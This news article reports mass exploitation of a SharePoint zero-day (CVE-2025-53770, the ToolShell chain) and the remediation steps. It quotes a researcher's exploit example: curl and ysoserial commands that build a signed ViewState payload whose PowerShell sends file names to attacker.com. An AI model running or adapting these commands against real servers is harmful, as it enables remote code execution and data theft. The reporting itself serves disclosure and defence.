Authorities and researchers are sounding the alarm over the active mass exploitation of a high-severity vulnerability in Microsoft SharePoint Server that’s allowing attackers to make off with sensitive company data, including authentication tokens used to access systems inside networks. Researchers said anyone running an on-premises instance of SharePoint should assume their networks are breached.
The vulnerability, tracked as CVE-2025-53770, carries a severity rating of 9.8 out of a possible 10. It gives unauthenticated remote access to SharePoint Servers exposed to the Internet. Starting Friday, researchers began warning of active exploitation of the vulnerability, which affects SharePoint Servers that infrastructure customers run in-house. Microsoft’s cloud-hosted SharePoint Online and Microsoft 365 are not affected.
Not your typical webshell
Microsoft confirmed the attacks on the then-zeroday exploit on Saturday. A day later, the company updated the post to make available an emergency update patching the vulnerability, and a related one tracked as CVE-2025-53771, in SharePoint Subscription Edition and SharePoint 2019.Customers using either version should apply the updates immediately. SharePoint 2016 remained unpatched at the time this Ars post went live. Microsoft said that organizations using this version should install the Antimalware Scan Interface.
The exploitation chain observed is closely related to chains demonstrated in May at the Pwn2Own hacking competition in Berlin for two separate vulnerabilities. The exploited vulnerabilities, tracked as CVE-2025-49704 and CVE-2025-49706, were partially patched two weeks ago in Microsoft's monthly update release. This weekend’s patches for CVE-2025-53770 and CVE-2025-53771 include “more robust protections” for CVE-2025-49704 and CVE-2025-49706 respectively, Microsoft said.
Installing the updates is only the beginning of the recovery process, since the infections are allowing attackers to make off with authentication credentials that give wide access to a variety of sensitive resources inside a compromised network. More about those additional steps later in this article.
On Saturday, researchers from security firm Eye Security reported finding “dozens of systems actively compromised during two waves of attack, on 18th of July around 18:00 UTC and 19th of July around 07:30 UTC.” The systems, scattered across the globe, had been hacked using the exploited vulnerability and then infected with a webshell-based backdoor called ToolShell. Eye Security researchers said that the backdoor was able to gain access to the most sensitive parts of a SharePoint Server and from there extract tokens that allowed them to execute code that let the attackers to expand their reach inside networks.
“This wasn’t your typical webshell,” Eye Security researchers wrote. “There were no interactive commands, reverse shells, or command-and-control logic. Instead, the page invoked internal .NET methods to read the SharePoint server’s MachineKey configuration, including the ValidationKey. These keys are essential for generating valid __VIEWSTATE payloads, and gaining access to them effectively turns any authenticated SharePoint request into a remote code execution opportunity.”
The remote code execution is made possible by using the exploit to target the way SharePoint translates data structures and object states into formats that can be stored or transmitted and then reconstructed later, a process known as serialization. A SharePoint vulnerability Microsoft fixed in 2021 had made it possible to abuse parsing logic to inject objects into pages. This occurred because SharePoint ran ASP.NET ViewState objects using the ValidationKey signing key, which is stored in the machine’s configuration. This could enable attackers to cause SharePoint to deserialize arbitrary objects and execute embedded commands. Those exploits, however, were limited by the requirement to generate a valid signature, which in turn required access to the server’s secret ValidationKey.
The researchers wrote:
Now, with the ToolShell chain (CVE-2025-49706 + CVE-2025-49704), attackers appear to extract the
ValidationKeydirectly from memory or configuration. Once this cryptographic material is leaked, the attacker can craft fully valid, signed__VIEWSTATEpayloads using a tool called ysoserial as shown in the example below.Using ysoserial the attacker can generate it’s own valid SharePoint tokens for RCE.
# command to get the via any public available SharePoint page, like start.aspx curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+' # example malicious Powershell viewstate payload that the adversary can utilize as RCE to list a dir ysoserial.exe -p ViewState -g TypeConfuseDelegate \ -c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \ --generator="" \ --validationkey="" \ --validationalg="" \ --islegacy \ --minify # finally, by adding the generated token to any request, the command is executed (RCE) curl http://target/_layouts/15/success.aspx?__VIEWSTATE=These payloads can embed any malicious commands and are accepted by the server as trusted input, completing the RCE chain without requiring credentials. This mirrors the design weakness exploited in 2021, but now packaged into a modern zero-day chain with automatic shell drop, full persistence, and zero authentication.
Patching is only the start
The attackers are using the capability to steal SharePoint ASP.NET machine keys, which allow the attackers to stage hacks of additional infrastructure at a later time. That means that patching alone provides no assurance attackers have been driven out of a compromised system. Instead, affected organizations must rotate SharePoint ASP.NET machine keys and restart the IIS webserver running on top.
According to The Washington Post, at least two federal agencies have found servers inside their networks were breached in the ongoing attacks.
The Eye Security post provides technical indicators that admins can use to determine if their systems have been targeted in the attacks. It also provides a variety of measures vulnerable organizations can take to harden their systems against the activity.
In a post Sunday, the US Cybersecurity and Infrastructure Security Agency confirmed the attacks and their use of ToolShell. The post went on to provide its own list of security measures.
Faraday Future is back with another wild EV that probably will never get made